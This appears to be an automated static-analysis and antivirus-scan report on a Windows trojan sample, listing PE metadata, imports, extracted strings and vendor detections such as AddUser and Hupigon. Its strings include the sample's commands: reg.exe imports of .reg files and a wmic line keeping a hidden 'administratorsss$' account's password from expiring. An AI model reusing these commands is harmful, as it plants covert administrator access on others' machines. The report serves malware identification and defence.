Static Analysis

PE Compile Time

2021-06-10 20:55:04

PE Imphash

5aee102ebddeb7518a093ed62315b89d

PEiD Signatures

Armadillo v1.71

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00011386 0x00012000 6.39050051564
.rdata 0x00013000 0x0000457e 0x00005000 4.09463085997
.data 0x00018000 0x00007710 0x00004000 2.04502147526
.rsrc 0x00020000 0x00000298 0x00001000 3.50677820117

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00020058 0x00000240 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED data

Imports

Library KERNEL32.dll:
0x41306c RtlUnwind
0x413070 RaiseException
0x413074 HeapSize
0x413078 TerminateProcess
0x41307c GetACP
0x413088 FlushFileBuffers
0x413094 SetHandleCount
0x413098 GetStdHandle
0x41309c GetFileType
0x4130a4 GetVersionExA
0x4130a8 HeapDestroy
0x4130ac HeapCreate
0x4130b0 VirtualFree
0x4130b8 VirtualAlloc
0x4130bc IsBadWritePtr
0x4130c0 LCMapStringA
0x4130c4 LCMapStringW
0x4130c8 GetStringTypeA
0x4130cc GetStringTypeW
0x4130d0 Sleep
0x4130d4 IsBadCodePtr
0x4130d8 InterlockedExchange
0x4130dc SetFilePointer
0x4130e0 WriteFile
0x4130e4 ReadFile
0x4130e8 GetCurrentProcess
0x4130ec GetOEMCP
0x4130f0 GetCPInfo
0x4130f4 MultiByteToWideChar
0x4130f8 WideCharToMultiByte
0x413100 GlobalFlags
0x413104 lstrcmpA
0x413108 GetProcessVersion
0x41310c GetLastError
0x413110 SetLastError
0x413114 LoadLibraryA
0x413118 FreeLibrary
0x41311c GlobalGetAtomNameA
0x413120 lstrcmpiA
0x413124 GlobalAddAtomA
0x413128 GlobalFindAtomA
0x41312c GlobalDeleteAtom
0x413130 GetProcAddress
0x413134 GetVersion
0x41313c TlsGetValue
0x413140 LocalReAlloc
0x413144 TlsSetValue
0x413148 SetStdHandle
0x413150 GlobalAlloc
0x413154 GlobalReAlloc
0x413158 GlobalLock
0x413160 TlsFree
0x413164 GlobalHandle
0x413168 GlobalUnlock
0x41316c GlobalFree
0x413174 TlsAlloc
0x41317c LocalFree
0x413180 LocalAlloc
0x413184 GetCurrentThreadId
0x413188 lstrlenA
0x41318c lstrcpynA
0x413190 GetModuleFileNameA
0x413194 lstrcpyA
0x413198 lstrcatA
0x41319c SetErrorMode
0x4131a0 DeleteFileA
0x4131a4 GetStartupInfoA
0x4131a8 CreateProcessA
0x4131ac WaitForSingleObject
0x4131b0 CloseHandle
0x4131b4 IsBadReadPtr
0x4131b8 HeapFree
0x4131bc HeapReAlloc
0x4131c0 HeapAlloc
0x4131c4 ExitProcess
0x4131c8 GetProcessHeap
0x4131cc GetCommandLineA
0x4131d4 GetModuleHandleA
Library USER32.dll:
0x4131dc AdjustWindowRectEx
0x4131e0 SetFocus
0x4131e4 GetSysColor
0x4131e8 MapWindowPoints
0x4131ec PostMessageA
0x4131f0 LoadIconA
0x4131f4 SetWindowTextA
0x4131f8 IsWindowEnabled
0x4131fc LoadCursorA
0x413200 GetSysColorBrush
0x413204 ReleaseDC
0x413208 GetDC
0x41320c GetClassNameA
0x413210 PtInRect
0x413214 ClientToScreen
0x413218 PostQuitMessage
0x41321c DestroyMenu
0x413220 TabbedTextOutA
0x413224 DrawTextA
0x413228 GrayStringA
0x41322c CopyRect
0x413230 EnableWindow
0x413234 GetTopWindow
0x413238 GetCapture
0x41323c WinHelpA
0x413240 GetClassInfoA
0x413244 RegisterClassA
0x413248 GetMenu
0x41324c GetMenuItemCount
0x413250 GetSubMenu
0x413254 GetMenuItemID
0x413258 GetDlgItem
0x41325c GetWindowTextA
0x413260 GetDlgCtrlID
0x413264 DestroyWindow
0x413268 CreateWindowExA
0x41326c GetClassLongA
0x413270 SetPropA
0x413274 GetPropA
0x413278 CallWindowProcA
0x41327c RemovePropA
0x413280 DefWindowProcA
0x413284 GetMessageTime
0x413288 GetMessagePos
0x41328c GetLastActivePopup
0x413290 GetForegroundWindow
0x413294 GetWindow
0x413298 GetWindowLongA
0x41329c SetWindowLongA
0x4132a0 SetWindowPos
0x4132ac IsIconic
0x4132b0 GetWindowPlacement
0x4132b4 GetWindowRect
0x4132b8 GetSystemMetrics
0x4132c0 LoadBitmapA
0x4132c4 GetMenuState
0x4132c8 ModifyMenuA
0x4132cc SetMenuItemBitmaps
0x4132d0 CheckMenuItem
0x4132d4 EnableMenuItem
0x4132d8 GetFocus
0x4132dc GetParent
0x4132e0 GetNextDlgTabItem
0x4132e4 LoadStringA
0x4132e8 UnhookWindowsHookEx
0x4132ec MessageBoxA
0x4132f0 wsprintfA
0x4132f4 SetWindowsHookExA
0x4132f8 GetClientRect
0x4132fc DispatchMessageA
0x413300 SendMessageA
0x413304 GetKeyState
0x413308 CallNextHookEx
0x41330c PeekMessageA
0x413310 SetForegroundWindow
Library GDI32.dll:
0x413008 SelectObject
0x41300c GetStockObject
0x413010 SetMapMode
0x413014 SetViewportOrgEx
0x413018 OffsetViewportOrgEx
0x41301c SetViewportExtEx
0x413020 ScaleViewportExtEx
0x413024 SetWindowExtEx
0x413028 ScaleWindowExtEx
0x41302c RestoreDC
0x413030 PtVisible
0x413034 RectVisible
0x413038 TextOutA
0x41303c ExtTextOutA
0x413040 Escape
0x413044 SaveDC
0x413048 DeleteDC
0x41304c DeleteObject
0x413050 GetDeviceCaps
0x413054 GetObjectA
0x413058 SetBkColor
0x41305c SetTextColor
0x413060 GetClipBox
0x413064 CreateBitmap
Library WINSPOOL.DRV:
0x413318 DocumentPropertiesA
0x41331c ClosePrinter
0x413320 OpenPrinterA
Library COMCTL32.dll:
0x413000 None
!This program cannot be run in DOS mode.
`.rdata
@.data
RPWWWj
t'9|$pt
t_h,8A
QQSVWd
t.;t$$t(
uRFGHt
sO;>|C;~
8t9UW
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
VC20XC00U
PPPPPPPP
VWuBh$DA
PPPPPPPP
HSVHWtgHHtF
tFGQPS
t/Ht HH
(wqt\HHtS
t>Ht Ht
tShP9A
hWj@_;
CCmdTarget
CTempWnd
AfxOldWndProc423
AfxWnd42s
AfxControlBar42s
AfxMDIFrame42s
AfxFrameOrView42s
AfxOleControl42s
GetMonitorInfoA
EnumDisplayMonitors
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
GetSystemMetrics
USER32
DISPLAY
commctrl_DragListMsg
InitCommonControlsEx
COMCTL32.DLL
CNotSupportedException
CMemoryException
CException
CObject
CMapPtrToPtr
combobox
CTempMenu
CTempGdiObject
CTempDC
CGdiObject
CUserException
CResourceException
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
__GLOBAL_HEAP_SELECTED
__MSVCRT_HEAP_SELECT
runtime error
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program:
<program name unknown>
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
ios::eofbit set
ios::failbit set
ios::badbit set
string too long
invalid string position
Unknown exception
GetModuleHandleA
GetCommandLineA
GetProcessHeap
ExitProcess
HeapAlloc
HeapReAlloc
HeapFree
IsBadReadPtr
CloseHandle
WaitForSingleObject
CreateProcessA
GetStartupInfoA
DeleteFileA
SetErrorMode
lstrcatA
lstrcpyA
GetModuleFileNameA
lstrcpynA
lstrlenA
GetCurrentThreadId
LocalAlloc
LocalFree
InitializeCriticalSection
TlsAlloc
DeleteCriticalSection
GlobalFree
GlobalUnlock
GlobalHandle
TlsFree
LeaveCriticalSection
GlobalLock
GlobalReAlloc
GlobalAlloc
EnterCriticalSection
TlsSetValue
LocalReAlloc
TlsGetValue
InterlockedDecrement
GetVersion
GetProcAddress
GlobalDeleteAtom
GlobalFindAtomA
GlobalAddAtomA
lstrcmpiA
GlobalGetAtomNameA
FreeLibrary
LoadLibraryA
SetLastError
GetLastError
GetProcessVersion
lstrcmpA
GlobalFlags
InterlockedIncrement
WideCharToMultiByte
MultiByteToWideChar
GetCPInfo
GetOEMCP
GetCurrentProcess
ReadFile
WriteFile
SetFilePointer
FlushFileBuffers
RtlUnwind
RaiseException
HeapSize
TerminateProcess
GetACP
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetEnvironmentVariableA
GetVersionExA
HeapDestroy
HeapCreate
VirtualFree
SetUnhandledExceptionFilter
VirtualAlloc
IsBadWritePtr
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
IsBadCodePtr
KERNEL32.dll
MessageBoxA
wsprintfA
SetWindowsHookExA
PeekMessageA
CallNextHookEx
GetKeyState
SendMessageA
DispatchMessageA
UnhookWindowsHookEx
LoadStringA
GetNextDlgTabItem
GetParent
GetFocus
EnableMenuItem
CheckMenuItem
SetMenuItemBitmaps
ModifyMenuA
GetMenuState
LoadBitmapA
GetMenuCheckMarkDimensions
GetSystemMetrics
GetWindowRect
GetWindowPlacement
IsIconic
SystemParametersInfoA
RegisterWindowMessageA
SetWindowPos
SetWindowLongA
GetWindowLongA
GetWindow
SetForegroundWindow
GetForegroundWindow
GetLastActivePopup
GetMessagePos
GetMessageTime
DefWindowProcA
RemovePropA
CallWindowProcA
GetPropA
SetPropA
GetClassLongA
CreateWindowExA
DestroyWindow
GetDlgCtrlID
GetWindowTextA
GetDlgItem
GetMenuItemID
GetSubMenu
GetMenuItemCount
GetMenu
RegisterClassA
GetClassInfoA
WinHelpA
GetCapture
GetTopWindow
EnableWindow
CopyRect
GetClientRect
AdjustWindowRectEx
SetFocus
GetSysColor
MapWindowPoints
PostMessageA
LoadIconA
SetWindowTextA
IsWindowEnabled
LoadCursorA
GetSysColorBrush
ReleaseDC
GetClassNameA
PtInRect
ClientToScreen
PostQuitMessage
DestroyMenu
TabbedTextOutA
DrawTextA
GrayStringA
USER32.dll
CreateBitmap
GetClipBox
SetTextColor
SetBkColor
GetObjectA
GetDeviceCaps
DeleteObject
DeleteDC
SaveDC
RestoreDC
SelectObject
GetStockObject
SetMapMode
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
SetWindowExtEx
ScaleWindowExtEx
PtVisible
RectVisible
TextOutA
ExtTextOutA
Escape
GDI32.dll
comdlg32.dll
ClosePrinter
DocumentPropertiesA
OpenPrinterA
WINSPOOL.DRV
ADVAPI32.dll
SHELL32.dll
COMCTL32.dll
InterlockedExchange
SetStdHandle
C:\Windows\System32\reg.exe import C:\Users\Public\administratorsss$2.reg
C:\Windows\System32\reg.exe import C:\Users\Public\administratorsss$.reg
wmic.exe UserAccount Where Name="administratorsss$"Set PasswordExpires="false"
C:\Users\Public\administratorsss$2.reg
C:\Users\Public\set.ini
Fatal Error: MFC initialization failed
program internal error number is %d.
program internal error number is %d.
:%d,%d
.PAVCException@@
.?AVCObject@@
.?AVCCmdTarget@@
.?AVCNoTrackObject@@
.?AV_AFX_CTL3D_STATE@@
.?AV_AFX_CTL3D_THREAD@@
.?AUCThreadData@@
.?AVCHandleMap@@
.?AV_AFX_THREAD_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AVCCmdUI@@
.?AVCWnd@@
.?AVCTestCmdUI@@
.?AVCTempWnd@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCException@@
.?AVCSimpleException@@
.?AVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCMapPtrToPtr@@
.?AV_AFX_WIN_STATE@@
.?AVCMenu@@
.?AVCTempMenu@@
.?AVCDC@@
.?AVCGdiObject@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.?AVCResourceException@@
.?AVCUserException@@
.?AVtype_info@@
.?AVios_base@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@GU?$char_traits@G@std@@@std@@
.?AV?$basic_istream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_ostream@GU?$char_traits@G@std@@@std@@
.?AV?$basic_filebuf@GU?$char_traits@G@std@@@std@@
.?AV?$basic_streambuf@GU?$char_traits@G@std@@@std@@
.?AVexception@@
.?AVruntime_error@std@@
.?AVfailure@ios_base@std@@
.?AVfacet@locale@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
HrCg@b
O(uckHr
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
((((( H
VS_VERSION_INFO
StringFileInfo
080404B0
FileVersion
1.0.0.0
FileDescription
ProductName
ProductVersion
1.0.0.0
LegalCopyright
Comments
(http://www.eyuyan.com)
VarFileInfo
Translation
Antivirus Signature
Bkav Clean
Lionic Trojan.Win32.Agent.Y!c
Elastic malicious (high confidence)
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Ghanarava.16261643043288af
Skyhigh BehavesLike.Win32.Generic.cm
McAfee Artemis!235F16084A81
Cylance Unsafe
Zillya Trojan.Agent.Win32.2327172
Sangfor Trojan.Win32.Agent.ilbl
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Trojan:Win32/Generic.73d06a9c
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
huorong Trojan/Generic!9C57EE0C6C17CE8D
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec Trojan.Gen.MBT
tehtris Clean
ESET-NOD32 Win32/AddUser.CD
APEX Clean
Avast Win32:Malware-gen
Cynet Malicious (score: 99)
Kaspersky Trojan.Win32.Agent.ilbl
BitDefender Clean
NANO-Antivirus Trojan.Win32.Graftor.ixpgnn
ViRobot Clean
MicroWorld-eScan Clean
Tencent Malware.Win32.Gencirc.13e9a410
Sophos Generic Reputation PUA (PUA)
F-Secure Heuristic.HEUR/AGEN.1344124
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfeeD ti!59B0A83D7B4F
Trapmine suspicious.low.ml.score
CTX Clean
Emsisoft Application.Generic (A)
Ikarus Backdoor.Win32.Hupigon
FireEye Clean
Jiangmin Clean
Webroot Clean
Varist Clean
Avira HEUR/AGEN.1344124
Fortinet Riskware/Application
Antiy-AVL Trojan/Win32.Agent
Kingsoft Clean
Gridinsoft Trojan.Win32.Agent.oa!s1
Xcitium Malware@#1dugr01jpw61d
Arcabit Clean
SUPERAntiSpyware Clean
Microsoft Program:Win32/Wacapew.C!ml
Google Detected
AhnLab-V3 Malware/Win.Generic.C4546359
Acronis Clean
VBA32 Trojan.Agent
TACHYON Clean
Malwarebytes PUP.Optional.ChinAd
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.Agent!8.B1E (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Clean
GData Clean
AVG Win32:Malware-gen
DeepInstinct MALICIOUS
alibabacloud Clean
IRMA Signature
Trend Micro SProtect (Linux) Clean
Avast Core Security (Linux) Clean
C4S ClamAV (Linux) Clean
Trellix (Linux) Clean
Sophos Anti-Virus (Linux) Mal/Generic-S
Bitdefender Antivirus (Linux) Clean
G Data Antivirus (Windows) Clean
WithSecure (Linux) Clean
ESET Security (Windows) Win32/AddUser.CD trojan
DrWeb Antivirus (Linux) Clean
ClamAV (Linux) Clean
eScan Antivirus (Linux) Clean
Kaspersky Standard (Windows) Trojan.Win32.Agent.ilbl
Emsisoft Commandline Scanner (Windows) Clean
Cuckoo

We're processing your submission... This could take a few seconds.